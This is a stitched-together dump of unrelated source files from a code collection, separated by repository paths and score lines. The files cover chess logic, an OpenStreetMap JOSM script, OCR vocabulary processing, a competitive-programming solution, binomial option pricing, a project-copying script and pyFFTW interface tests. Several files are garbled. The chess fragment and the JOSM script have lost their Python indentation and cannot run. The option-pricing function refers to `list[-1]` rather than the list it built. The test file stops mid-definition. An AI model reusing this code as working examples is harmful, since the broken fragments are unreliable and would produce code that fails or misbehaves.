king_coords = player.get_king().get_coords()
if king_coords not in self.get_legal_player(opponent):
return "SM"
return "CM"
| 3.640625 | 4 |
josm/uniteStopAreaRelationsByName.py | mapanica/scripts | 0 | 12769961 | #!/bin/jython
'''
This code is released under the
WTFPL – Do What the Fuck You Want to Public License.
'''
from javax.swing import JOptionPane
from org.openstreetmap.josm import Main
import org.openstreetmap.josm.command as Command
import org.openstreetmap.josm.data.osm.Node as Node
import org.openstreetmap.josm.data.osm.Way as Way
import org.openstreetmap.josm.data.osm.Relation as Relation
import org.openstreetmap.josm.data.Bounds as Bounds
import org.openstreetmap.josm.data.osm.visitor.BoundingXYVisitor as BoundingXYVisitor
import org.openstreetmap.josm.data.osm.TagCollection as TagCollection
import org.openstreetmap.josm.data.osm.DataSet as DataSet
import org.openstreetmap.josm.data.osm.RelationMember as RelationMember
import org.openstreetmap.josm.actions.search.SearchAction as SearchAction
import org.openstreetmap.josm.actions.mapmode.DeleteAction as DeleteAction
import re, time, sys
import codecs
def getMapView():
if Main.main and Main.main.map:
return Main.main.map.mapView
else:
return None
mv = getMapView()
if mv and mv.editLayer and mv.editLayer.data:
relations = dict();
i = 0;
print "Start";
# Loop through all stop area relations
for relation in mv.editLayer.data.getRelations():
if (relation.get('public_transport') == 'stop_area'):
name = relation.get('name');
if name not in relations.keys():
relations[name] = relation;
elif isinstance(name, basestring):
                # Get one node from each relation
for member in relation.getMembers():
if member.isNode():
firstNode = member.getNode();
for member in relations[name].getMembers():
if member.isNode():
secondNode = member.getNode();
# Compare distance between nodes from two relations
distance = firstNode.getCoor().distanceSq(secondNode.getCoor())
                                # If they are close enough, we assume we have two stop areas that can be merged
if distance < 0.00003:
# Add members from one relation to the other
for member in relations[name].getMembers():
relation.addMember(member);
# Delete the other relation
print 'Relation unite! ' + name;
DeleteAction.deleteRelation(Main.getLayerManager().getEditLayer(), relations[name]);
i = i +1;
print i;
| 1.945313 | 2 |
services/process/icdar_process_service.py | ktodorov/historical-ocr | 0 | 12769962 | from entities.cache.cache_options import CacheOptions
import os
from services.file_service import FileService
from typing import List
from enums.ocr_output_type import OCROutputType
from enums.language import Language
from services.process.process_service_base import ProcessServiceBase
from services.download.ocr_download_service import OCRDownloadService
from services.arguments.ocr_quality_non_context_arguments_service import OCRQualityNonContextArgumentsService
from services.cache_service import CacheService
from services.log_service import LogService
from services.vocabulary_service import VocabularyService
from services.tokenize.base_tokenize_service import BaseTokenizeService
class ICDARProcessService(ProcessServiceBase):
def __init__(
self,
ocr_download_service: OCRDownloadService,
arguments_service: OCRQualityNonContextArgumentsService,
cache_service: CacheService,
vocabulary_service: VocabularyService,
tokenize_service: BaseTokenizeService,
log_service: LogService):
self._arguments_service = arguments_service
self._cache_service = cache_service
self._ocr_download_service = ocr_download_service
self._vocabulary_service = vocabulary_service
self._tokenize_service = tokenize_service
self._log_service = log_service
self._min_occurrence_limit = self._arguments_service.minimal_occurrence_limit
self._vocab_key = f'vocab-{self._get_dataset_string()}-{arguments_service.ocr_output_type.value}'
if not self._vocabulary_service.load_cached_vocabulary(self._vocab_key):
self._log_service.log_debug(
'Vocabulary was not loaded. Attempting to initialize...')
self._initialize_vocabulary()
else:
self._log_service.log_debug('Vocabulary loaded successfully')
def _initialize_vocabulary(self):
self._ocr_download_service.download_data(
self._arguments_service.language)
ocr_data, gs_data = self._read_data()
tokenized_data = self._tokenize_service.tokenize_sequences(
gs_data if self._arguments_service.ocr_output_type == OCROutputType.GroundTruth else ocr_data
)
self._log_service.log_debug(
f'Tokenized {len(tokenized_data)} strings successfully')
self._vocabulary_service.initialize_vocabulary_from_corpus(
tokenized_data,
min_occurrence_limit=self._min_occurrence_limit,
vocab_key=self._vocab_key)
def _generate_ocr_corpora(self):
ocr_data, gs_data = self._read_data()
tokenized_ocr_data = self._tokenize_service.tokenize_sequences(
ocr_data)
tokenized_gs_data = self._tokenize_service.tokenize_sequences(gs_data)
self._save_common_tokens(tokenized_ocr_data, tokenized_gs_data)
ocr_output_type = self._arguments_service.ocr_output_type
data_ids = [self._vocabulary_service.string_to_ids(
x) for x in (tokenized_ocr_data if ocr_output_type == OCROutputType.Raw else tokenized_gs_data)]
result = self._generate_corpora_entries(data_ids)
return result
def _generate_corpora_entries(self, data_ids):
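        # Base-class stub; presumably overridden by dataset-specific subclasses
        # to turn the token-id sequences into training entries.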
return None
def _save_common_tokens(self, tokenized_ocr_data: List[List[str]], tokenized_gs_data: List[List[str]]):
"""Saves the intersection of the tokens from both output types, as well as the ids of these tokens for the current output type
:param tokenized_ocr_data: The tokenized data for OCR output type
:type tokenized_ocr_data: List[List[str]]
:param tokenized_gs_data: The tokenized data for GT output type
:type tokenized_gs_data: List[List[str]]
"""
self._log_service.log_debug('Saving common tokens')
token_pairs_cache_key = f'common-t-pairs-{self._get_dataset_string()}-{self._arguments_service.ocr_output_type.value}-lim-{self._arguments_service.minimal_occurrence_limit}'
if self._cache_service.item_exists(CacheOptions(token_pairs_cache_key)):
return
common_tokens = self._cache_service.get_item_from_cache(
CacheOptions(
f'common-tokens-{self._get_dataset_string()}',
configuration_specific=False),
callback_function=lambda: self._combine_common_words(tokenized_ocr_data, tokenized_gs_data))
token_id_pairs = []
for common_token in common_tokens:
token_ids = [self._vocabulary_service.string_to_id(common_token)]
if token_ids[0] == self._vocabulary_service.unk_token:
token_ids = None
token_id_pairs.append((common_token, token_ids))
self._cache_service.cache_item(
token_id_pairs,
CacheOptions(token_pairs_cache_key))
self._log_service.log_debug(
f'Saved {len(token_id_pairs)} common token pairs successfully')
def _combine_common_words(self, tokenized_ocr_data: List[List[str]], tokenized_gs_data: List[List[str]]):
ocr_unique_tokens = set(
[item for sublist in tokenized_ocr_data for item in sublist])
gs_unique_tokens = set(
[item for sublist in tokenized_gs_data for item in sublist])
common_tokens = list(ocr_unique_tokens & gs_unique_tokens)
return common_tokens
def _load_file_data(self):
number_of_files = len(self._arguments_service.datasets)
ocr_file_data = []
gs_file_data = []
for i, dataset in enumerate(self._arguments_service.datasets):
print(f'{i}/{number_of_files} \r', end='')
result = self._ocr_download_service.get_downloaded_dataset(dataset)
if result is None:
self._log_service.log_debug(
f'Did not find \'{dataset}\' dataset to load')
continue
else:
self._log_service.log_debug(f'Loading \'{dataset}\' data')
ocr_file_data.extend(result[0])
gs_file_data.extend(result[1])
return ocr_file_data, gs_file_data
def _read_data(self):
ocr_file_data, gs_file_data = self._cache_service.get_item_from_cache(
CacheOptions(
f'ocr-gs-file-data-{self._get_dataset_string()}',
configuration_specific=False),
callback_function=self._load_file_data)
return ocr_file_data, gs_file_data
def _get_dataset_string(self):
        return '-'.join(sorted(self._arguments_service.datasets))
| 2 | 2 |
tasks/task_viper/temp.py | chenyanghungry/person-reid-lib | 81 | 12769963 | import numpy as np
a = np.array([53, 13, 84, 32, 1])  # a plain list cannot be indexed by an index array
b = np.random.choice(len(a), 3, replace=True)  # sample 3 indices with replacement
print(a[b])
| 2.734375 | 3 |
beginner_contest/133/B.py | FGtatsuro/myatcoder | 0 | 12769964 | _input = [i for i in open(0).read().split('\n') if i]
n, d = [int(i) for i in _input[0].split()]
x_list = [[int(i) for i in x.split()] for x in _input[1:]]
import math
from itertools import combinations
count = 0
for x1, x2 in combinations(x_list, 2):
    dist = math.sqrt(sum((x1[i] - x2[i]) ** 2 for i in range(d)))
    if dist != 0 and dist.is_integer():
        count += 1
print(count)
| 3.078125 | 3 |
Quantitative Finance/MultiPeriod_Bionmial.py | darnoceloc/Algorithms | 0 | 12769965 | """
# T: maturity
# n: # option periods
# N: # futures periods
# S: initial stock price
# r: continuously-compounded interest rate
# c: dividend yield
# sigma: annualized volatility
# K: strike price
# cp: +1/-1 with regards to call/put
"""
from __future__ import division
from math import exp, sqrt
import numpy as np
import math
T = 0.25
n = 15 # option periods
N = 15 # futures periods
S = 100 #initial stock price
r = 0.02 #continuously-compounded interest rate
c = 0.01 #dividend yield
sigma = 0.3 #annualized volatility
K = 110 #strike price
cp = -1 #with regards to call/put
def Parameter(T,n,sigma,r,c):
"""Parameter calculation"""
dt = T/n
u = exp(sigma * sqrt(dt))
d = 1/u
q1 = (exp((r-c)*dt)-d)/(u-d)
q2 = 1-q1
R = exp(r*dt)
return (u, d, q1, q2, R)
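# Illustrative sanity check (not part of the original script): the CRR-style
# parameters should give a recombining lattice (u*d == 1) and a valid
# risk-neutral probability q1.
def _check_parameters():
    u, d, q1, q2, R = Parameter(T, n, sigma, r, c)
    assert abs(u * d - 1.0) < 1e-12  # lattice recombines
    assert 0.0 < q1 < 1.0 and abs(q1 + q2 - 1.0) < 1e-12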
# =============================================================================
def GenerateTree(T,n,S,sigma,r,c):
"""generate stock tree"""
u, d, q1, q2, R = Parameter(T,n,sigma,r,c)
stockTree = np.zeros((n+1, n+1))
# compute the stock tree
stockTree[0,0] = S
for i in range(1,n+1):
stockTree[0,i] = stockTree[0, i-1]*u
for j in range(1,n+1):
stockTree[j,i] = stockTree[j-1, i-1]*d
return stockTree
# =============================================================================
def StockOptionAM(T,n,S,r,c,sigma,K,cp):
"""first return: American Stock Option Pricing"""
"""second return: when is the earliest time to exercise"""
"""Though it's never optimal to early exercise AM call"""
"""It matters for AM put"""
u, d, q1, q2, R = Parameter(T,n,sigma,r,c)
stockTree = GenerateTree(T,n,S,sigma,r,c)
optionTree = np.zeros((n+1,n+1))
# compute the option tree
for j in range(n+1):
optionTree[j, n] = max(0, cp * (stockTree[j, n]-K))
flag = 0
    exercise_times = []
for i in range(n-1,-1,-1):
for j in range(i+1):
optionTree[j, i] = max((q1 * optionTree[j, i+1] + q2 * optionTree[j+1, i+1])/R,
cp * (stockTree[j, i] - K))
if (optionTree[j, i] - cp * (stockTree[j, i] - K)) < 1e-10:
flag += 1
                exercise_times.append(i)
when = n
if(flag): when = list[-1]
print(optionTree, when)
return (optionTree[0,0], when)
z = StockOptionAM(T,n,S,r,c,sigma,K,cp)
option_maturity = 10
class bs_bin_tree:
def __init__(self,T,s0,r,sigma,c,K,n):
self.T = T
self.r = r
self.c = c
self.sigma = sigma
self.K = K
self.s0 = s0
self.n = n
self.u = math.exp(self.sigma*np.sqrt(self.T/self.n))
self.q = (math.exp((self.r-self.c)*T/self.n)-(1/self.u))/(self.u-(1/self.u))
self.R = math.exp(self.r*self.T/self.n)
self.__print_param__()
def __print_param__(self):
print('Time',self.T)
print('Starting Price',self.s0)
print('r',self.r)
print('volatility',self.sigma)
print('dividend yield',self.c)
print('strike',self.K)
print('# period',self.n)
def generate_price(self):
arr=[[self.s0]]
for i in range(self.n):
arr_to_add=[]
for j in range(len(arr[i])):
arr_to_add.append(arr[i][j]/self.u)
if j == (len(arr[i])-1):
arr_to_add.append(arr[i][j]*self.u)
arr.append(arr_to_add)
return arr
def neutral_pricing(self,p1,p2):
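        # One-step risk-neutral pricing: discount the q-weighted expectation,
        # where p1 is the value in the down state and p2 in the up state.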
price = ((1-self.q)*p1 + (self.q)*p2)/self.R
return price
def eu_put(self):
arr = self.generate_price()
arr_rev = arr[::-1]
res=[]
for i in range(len(arr_rev)):
res_to_add = []
for j in range(len(arr_rev[i])):
if i == 0:
a = max(self.K-arr_rev[i][j],0)
res_to_add.append(a)
else:
price = self.neutral_pricing(res[i-1][j], res[i-1][j+1])
#a = max(arr_rev[i][j]-strike,0)
#a = max(a,price)
a = price
res_to_add.append(a)
res.append(res_to_add)
return res[::-1]
def eu_call(self):
arr = self.generate_price()
arr_rev = arr[::-1]
res=[]
for i in range(len(arr_rev)):
res_to_add = []
for j in range(len(arr_rev[i])):
if i == 0:
a = max(arr_rev[i][j]-self.K,0)
res_to_add.append(a)
else:
price = self.neutral_pricing(res[i-1][j], res[i-1][j+1])
#a = max(arr_rev[i][j]-strike,0)
#a = max(a,price)
a = price
res_to_add.append(a)
res.append(res_to_add)
return res[::-1]
def us_call(self):
arr = self.generate_price()
arr_rev = arr[::-1]
res=[]
for i in range(len(arr_rev)):
res_to_add = []
for j in range(len(arr_rev[i])):
if i == 0:
a = max(arr_rev[i][j]-self.K,0)
res_to_add.append(a)
else:
price = self.neutral_pricing(res[i-1][j], res[i-1][j+1])
a1 = max(arr_rev[i][j]-self.K,0)
a = max(a1,price)
res_to_add.append(a)
res.append(res_to_add)
return res[::-1]
def us_call_price(self):
return self.us_call()[0][0]
def us_put(self):
arr = self.generate_price()
arr_rev = arr[::-1]
res=[]
for i in range(len(arr_rev)):
res_to_add = []
for j in range(len(arr_rev[i])):
if i == 0:
a = max(self.K-arr_rev[i][j],0)
res_to_add.append(a)
else:
price = self.neutral_pricing(res[i-1][j], res[i-1][j+1])
a1 = max(self.K - arr_rev[i][j],0)
a = max(a1,price)
res_to_add.append(a)
res.append(res_to_add)
return res[::-1]
def us_put_price(self):
return self.us_put()[0][0]
def us_put_early_ex(self):
early_ex = False
early_ex_earning = 0
early_ex_time = self.n
arr = self.generate_price()
arr_rev = arr[::-1]
res=[]
for i in range(len(arr_rev)):
res_to_add = []
for j in range(len(arr_rev[i])):
if i == 0:
a = max(self.K-arr_rev[i][j],0)
res_to_add.append(a)
else:
price = self.neutral_pricing(res[i-1][j], res[i-1][j+1])
a1 = max(self.K-arr_rev[i][j],0)
if a1 > price:
if early_ex_time == self.n - i:
early_ex_earning = max(early_ex_earning,a1)
else:
early_ex_earning = a1
early_ex =True
early_ex_time = self.n - i
a = max(a1,price)
res_to_add.append(a)
res.append(res_to_add)
return {early_ex_time:early_ex_earning} if early_ex == True else False
def us_put_call_parity(self):
LHS = self.us_put_price() + self.s0 * math.exp(-self.c * self.T)
RHS = self.us_call_price() + self.K * math.exp(-self.r * self.T)
print('Put Side',LHS)
print('Call Side',RHS)
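        # Note: the exact float equality below is almost never True; put-call
        # parity holds as an equality only for European options, so this check
        # is expected to report False for American prices.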
return LHS==RHS
def generate_future_price(self):
arr = self.generate_price()
arr_rev = arr[::-1]
res=[]
for i in range(len(arr_rev)):
res_to_add = []
for j in range(len(arr_rev[i])):
if i == 0:
res_to_add.append(arr_rev[i][j])
else:
price = self.neutral_pricing(res[i-1][j], res[i-1][j+1])*self.R
res_to_add.append(price)
res.append(res_to_add)
return res[::-1]
def option_on_future(self,option_maturity):
arr = self.generate_future_price()[0:option_maturity+1]
arr_rev = arr[::-1]
res=[]
for i in range(option_maturity+1):
res_to_add = []
for j in range(len(arr_rev[i])):
if i == 0:
a = max(arr_rev[i][j]-self.K,0)
res_to_add.append(a)
else:
price = self.neutral_pricing(res[i-1][j], res[i-1][j+1])
a1 = max(arr_rev[i][j]-self.K,0)
a = max(a1,price)
res_to_add.append(a)
res.append(res_to_add)
return res[::-1]
def option_price_on_future(self,option_maturity):
return self.option_on_future(option_maturity)[0][0]
def option_on_future_early_ex(self,option_maturity):
arr = self.generate_future_price()[0:option_maturity+1]
arr_rev = arr[::-1]
res=[]
early_ex = False
early_ex_earning = 0
early_ex_time = self.n
for i in range(option_maturity+1):
res_to_add = []
for j in range(len(arr_rev[i])):
if i == 0:
a = max(arr_rev[i][j]-self.K,0)
res_to_add.append(a)
else:
price = self.neutral_pricing(res[i-1][j], res[i-1][j+1])
a1 = max(arr_rev[i][j]-self.K,0)
if a1 > price:
if early_ex_time == option_maturity - i:
early_ex_earning = max(early_ex_earning,a1)
else:
early_ex_earning = a1
early_ex =True
early_ex_time = len(arr_rev) - i -1
a = max(a1,price)
res_to_add.append(a)
res.append(res_to_add)
return {early_ex_time:early_ex_earning} if early_ex == True else False
def nCr(self,n,r):
f = math.factorial
return f(n) / f(r) / f(n-r)
def chooser_option_price(self,option_expire):
call = self.eu_call()[option_expire]
put = self.eu_put()[option_expire]
res=[]
for i in range(len(call)):
res.append(max(call[i],put[i]))
result=0
for j in range(0,len(res)):
result += self.nCr(option_expire,j)* (self.q**(j)) * (1-self.q)**(option_expire-j) * res[j]
return (result/self.R**(option_expire))
tree = bs_bin_tree(T, 100, r, sigma, c, K, n)
print(tree.us_call())
print(tree.us_call_price())
print(tree.us_put())
print(tree.us_put_price())
print(tree.us_put_early_ex())
print(tree.us_put_call_parity())
print(tree.option_on_future(option_maturity))
print(tree.option_price_on_future(option_maturity))
print(tree.option_on_future_early_ex(option_maturity))
print(tree.chooser_option_price(10))
| 3.328125 | 3 |
projects/make-project.py | 2-complex/g2c | 1 | 12769966 | import shutil
import sys
import os
def replace_in_file(path, a, b):
f = open(path, 'r')
s = f.read().replace(a, b)
f.close()
f = open(path, 'w')
f.write(s)
f.close()
def replace_in_filename(path, a, b):
j = len(path)-1
if path[-1]!='/':
j-=1
while j>0 and path[j]!='/':
j-=1
base = path[:j]
filename = path[j:]
if a in filename:
newname = filename.replace(a, b)
os.rename(path, base+newname)
return base+newname
return path
def deepreplace(path, a, b):
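    """Recursively replace a with b in the contents and names of all files under path."""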
l = []
if path == '':
path = '.'
print path
if os.path.isdir(path):
l = os.listdir(path)
for f in l:
deepreplace(os.path.join(path, f), a, b)
else:
replace_in_file(path, a, b)
replace_in_filename(path, a, b)
def go():
print "****************************************************************************************"
print "* Interactive script for creating a project directory based on a direcotry in blanks/. *"
print "****************************************************************************************"
print ""
script_path = os.path.dirname(os.path.realpath(__file__))
cello_dir = os.path.realpath("..")
blanks_dir = os.path.join(cello_dir, "blanks")
while not os.path.isdir(blanks_dir):
print "Could not find blanks/ directory " + blanks_dir + ". Where is cello?"
cello_dir = raw_input("Enter path to cello root directory: ")
blanks_dir = os.path.join(cello_dir, "projects", "blanks")
print ""
print "At what path would you like to place the new project directory?"
target_path = raw_input("(default = " + os.getcwd() + ") ? ")
print ""
blanks = os.listdir(blanks_dir)
def visible(s):
return s[0] != '.'
blanks = filter(visible, blanks)
blank_name = ""
while blank_name not in blanks:
print "What blank project would you like to copy from? (" + ", ".join(blanks) + ")"
blank_name = raw_input("(select one of: " + ", ".join(blanks) + ") ? ")
print ""
source_path = os.path.join(blanks_dir, blank_name)
destination_path = os.path.join(os.getcwd(), blank_name)
print "Will make a project by copying..."
print "from: " + source_path
print "to: " + destination_path
print ""
if os.path.exists(destination_path):
response = ''
while not response in ['y', 'n', 'yes', 'no']:
print destination_path + " already exists. Would you like to replace it?"
response = raw_input("This will delete destination_path and make a new one (y/n) ? ").lower()
if not response.startswith('y'):
print "Goodbye."
print ""
return
if os.path.exists(destination_path):
try:
shutil.rmtree(destination_path)
except:
print "Exception when trying to remove " + destination_path
print "Bailing."
print ""
return
print "What shall the name of the project be?"
project_name = raw_input("New project name ? ")
shutil.copytree(source_path, destination_path)
deepreplace(destination_path, "Blank", project_name)
go()
| 3.25 | 3 |
test/test_pyfftw_numpy_interface.py | insertinterestingnamehere/pyFFTW | 0 | 12769967 | # Copyright 2014 Knowledge Economy Developments Ltd
#
# <NAME>
# <EMAIL>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
from pyfftw import interfaces
from .test_pyfftw_base import run_test_suites
import unittest
import numpy
from numpy import fft as np_fft
import inspect
import warnings
import copy
warnings.filterwarnings('always')
if numpy.version.version <= '1.6.2':
# We overwrite the broken _cook_nd_args with a fixed version.
from ._cook_nd_args import _cook_nd_args
numpy.fft.fftpack._cook_nd_args = _cook_nd_args
complex_dtypes = (numpy.complex64, numpy.complex128, numpy.clongdouble)
real_dtypes = (numpy.float32, numpy.float64, numpy.longdouble)
def make_complex_data(shape, dtype):
ar, ai = dtype(numpy.random.randn(2, *shape))
return ar + 1j*ai
def make_real_data(shape, dtype):
return dtype(numpy.random.randn(*shape))
functions = {
'fft': 'complex',
'ifft': 'complex',
'rfft': 'r2c',
'irfft': 'c2r',
'rfftn': 'r2c',
'hfft': 'c2r',
'ihfft': 'r2c',
'irfftn': 'c2r',
'rfft2': 'r2c',
'irfft2': 'c2r',
'fft2': 'complex',
'ifft2': 'complex',
'fftn': 'complex',
'ifftn': 'complex'}
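# Maps each numpy.fft routine name to its transform kind; the kind selects the
# input dtypes and the data generator used by the test cases below.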
acquired_names = ('fftfreq', 'fftshift', 'ifftshift')
class InterfacesNumpyFFTTestModule(unittest.TestCase):
''' A really simple test suite to check the module works as expected.
'''
def test_acquired_names(self):
for each_name in acquired_names:
numpy_fft_attr = getattr(numpy.fft, each_name)
acquired_attr = getattr(interfaces.numpy_fft, each_name)
self.assertIs(numpy_fft_attr, acquired_attr)
class InterfacesNumpyFFTTestFFT(unittest.TestCase):
io_dtypes = {
'complex': (complex_dtypes, make_complex_data),
'r2c': (real_dtypes, make_real_data),
'c2r': (complex_dtypes, make_complex_data)}
validator_module = np_fft
test_interface = interfaces.numpy_fft
func = 'fft'
axes_kw = 'axis'
overwrite_input_flag = 'overwrite_input'
default_s_from_shape_slicer = slice(-1, None)
test_shapes = (
((100,), {}),
((128, 64), {'axis': 0}),
((128, 32), {'axis': -1}),
((59, 100), {}),
((59, 99), {'axis': -1}),
((59, 99), {'axis': 0}),
((32, 32, 4), {'axis': 1}),
((64, 128, 16), {}),
)
    # invalid_args entries are:
    # (size, args, error_type, error_string)
invalid_args = (
((100,), ((100, 200),), TypeError, ''),
((100, 200), ((100, 200),), TypeError, ''),
((100,), (100, (-2, -1)), TypeError, ''),
((100,), (100, -20), IndexError, ''))
realinv = False
@property
def test_data(self):
for test_shape, kwargs in self.test_shapes:
axes = self.axes_from_kwargs(kwargs)
s = self.s_from_kwargs(test_shape, kwargs)
if self.realinv:
test_shape = list(test_shape)
test_shape[axes[-1]] = test_shape[axes[-1]]//2 + 1
test_shape = tuple(test_shape)
yield test_shape, s, kwargs
def __init__(self, *args, **kwargs):
super(InterfacesNumpyFFTTestFFT, self).__init__(*args, **kwargs)
# Assume python 3, but keep backwards compatibility
if not hasattr(self, 'assertRaisesRegex'):
self.assertRaisesRegex = self.assertRaisesRegexp
def validate(self, array_type, test_shape, dtype,
s, kwargs):
# Do it without the cache
# without:
interfaces.cache.disable()
self._validate(array_type, test_shape, dtype, s, kwargs)
def munge_input_array(self, array, kwargs):
return array
def _validate(self, array_type, test_shape, dtype,
s, kwargs):
input_array = self.munge_input_array(
array_type(test_shape, dtype), kwargs)
orig_input_array = copy.copy(input_array)
np_input_array = numpy.asarray(input_array)
if np_input_array.dtype == 'clongdouble':
np_input_array = numpy.complex128(input_array)
elif np_input_array.dtype == 'longdouble':
np_input_array = numpy.float64(input_array)
with warnings.catch_warnings(record=True) as w:
# We catch the warnings so as to pick up on when
# a complex array is turned into a real array
if 'axes' in kwargs:
axes = {'axes': kwargs['axes']}
elif 'axis' in kwargs:
axes = {'axis': kwargs['axis']}
else:
axes = {}
try:
test_out_array = getattr(self.validator_module, self.func)(
copy.copy(np_input_array), s, **axes)
except Exception as e:
interface_exception = None
try:
getattr(self.test_interface, self.func)(
copy.copy(input_array), s, **kwargs)
except Exception as _interface_exception:
# It's necessary to assign the exception to the
# already defined variable in Python 3.
# See http://www.python.org/dev/peps/pep-3110/#semantic-changes
interface_exception = _interface_exception
# If the test interface raised, so must this.
self.assertEqual(type(interface_exception), type(e),
msg='Interface exception raised. ' +
'Testing for: ' + repr(e))
return
output_array = getattr(self.test_interface, self.func)(
copy.copy(input_array), s, **kwargs)
if (functions[self.func] == 'r2c'):
if numpy.iscomplexobj(input_array):
if len(w) > 0:
# Make sure a warning is raised
self.assertIs(
w[-1].category, numpy.ComplexWarning)
self.assertTrue(
numpy.allclose(output_array, test_out_array,
rtol=1e-2, atol=1e-4))
input_precision_dtype = numpy.asanyarray(input_array).real.dtype
self.assertEqual(input_precision_dtype,
output_array.real.dtype)
if (not self.overwrite_input_flag in kwargs or
not kwargs[self.overwrite_input_flag]):
self.assertTrue(numpy.allclose(input_array,
orig_input_array))
return output_array
def axes_from_kwargs(self, kwargs):
argspec = inspect.getargspec(getattr(self.test_interface, self.func))
default_args = dict(list(zip(
argspec.args[-len(argspec.defaults):], argspec.defaults)))
if 'axis' in kwargs:
axes = (kwargs['axis'],)
elif 'axes' in kwargs:
axes = kwargs['axes']
if axes is None:
axes = default_args['axes']
else:
if 'axis' in default_args:
# default 1D
axes = (default_args['axis'],)
else:
# default nD
axes = default_args['axes']
if axes is None:
axes = (-1,)
return axes
def s_from_kwargs(self, test_shape, kwargs):
''' Return either a scalar s or a tuple depending on
whether axis or axes is specified
'''
argspec = inspect.getargspec(getattr(self.test_interface, self.func))
default_args = dict(list(zip(
argspec.args[-len(argspec.defaults):], argspec.defaults)))
if 'axis' in kwargs:
s = test_shape[kwargs['axis']]
elif 'axes' in kwargs:
axes = kwargs['axes']
if axes is not None:
s = []
for each_axis in axes:
s.append(test_shape[each_axis])
else:
# default nD
s = []
try:
for each_axis in default_args['axes']:
s.append(test_shape[each_axis])
except TypeError:
try:
s = list(test_shape[
self.default_s_from_shape_slicer])
except TypeError:
# We had an integer as the default, so force
# it to be a list
s = [test_shape[self.default_s_from_shape_slicer]]
else:
if 'axis' in default_args:
# default 1D
s = test_shape[default_args['axis']]
else:
# default nD
s = []
try:
for each_axis in default_args['axes']:
s.append(test_shape[each_axis])
except TypeError:
s = None
return s
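    # Illustrative mapping performed by s_from_kwargs (shapes here are
    # hypothetical examples, not entries of test_shapes):
    #   test_shape=(59, 99),      kwargs={'axis': -1}     -> s = 99 (a scalar)
    #   test_shape=(64, 128, 16), kwargs={'axes': (0, 2)} -> s = [64, 16]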
def test_valid(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
s = None
self.validate(dtype_tuple[1],
test_shape, dtype, s, kwargs)
def test_on_non_numpy_array(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
array_type = (lambda test_shape, dtype:
dtype_tuple[1](test_shape, dtype).tolist())
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
s = None
self.validate(array_type,
test_shape, dtype, s, kwargs)
def test_fail_on_invalid_s_or_axes(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, args, exception, e_str in self.invalid_args:
input_array = dtype_tuple[1](test_shape, dtype)
self.assertRaisesRegex(exception, e_str,
getattr(self.test_interface, self.func),
*((input_array,) + args))
def test_same_sized_s(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
self.validate(dtype_tuple[1],
test_shape, dtype, s, kwargs)
def test_bigger_s(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
try:
for each_axis, length in enumerate(s):
s[each_axis] += 2
except TypeError:
s += 2
self.validate(dtype_tuple[1],
test_shape, dtype, s, kwargs)
def test_smaller_s(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
try:
for each_axis, length in enumerate(s):
s[each_axis] -= 2
except TypeError:
s -= 2
self.validate(dtype_tuple[1],
test_shape, dtype, s, kwargs)
def check_arg(self, arg, arg_test_values, array_type, test_shape,
dtype, s, kwargs):
'''Check that the correct arg is passed to the builder'''
# We trust the builders to work as expected when passed
# the correct arg (the builders have their own unittests).
return_values = []
input_array = array_type(test_shape, dtype)
def fake_fft(*args, **kwargs):
return_values.append((args, kwargs))
return (args, kwargs)
try:
# Replace the function that is to be used
real_fft = getattr(self.test_interface, self.func)
setattr(self.test_interface, self.func, fake_fft)
_kwargs = kwargs.copy()
for each_value in arg_test_values:
_kwargs[arg] = each_value
builder_args = getattr(self.test_interface, self.func)(
input_array.copy(), s, **_kwargs)
self.assertTrue(builder_args[1][arg] == each_value)
# make sure it was called
self.assertTrue(len(return_values) > 0)
except:
raise
finally:
# Make sure we set it back
setattr(self.test_interface, self.func, real_fft)
        # Validate it as well
for each_value in arg_test_values:
_kwargs[arg] = each_value
builder_args = getattr(self.test_interface, self.func)(
input_array.copy(), s, **_kwargs)
self.validate(array_type, test_shape, dtype, s, _kwargs)
def test_auto_align_input(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
self.check_arg('auto_align_input', (True, False),
dtype_tuple[1], test_shape, dtype, s, kwargs)
def test_auto_contiguous_input(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
self.check_arg('auto_contiguous', (True, False),
dtype_tuple[1], test_shape, dtype, s, kwargs)
def test_bigger_and_smaller_s(self):
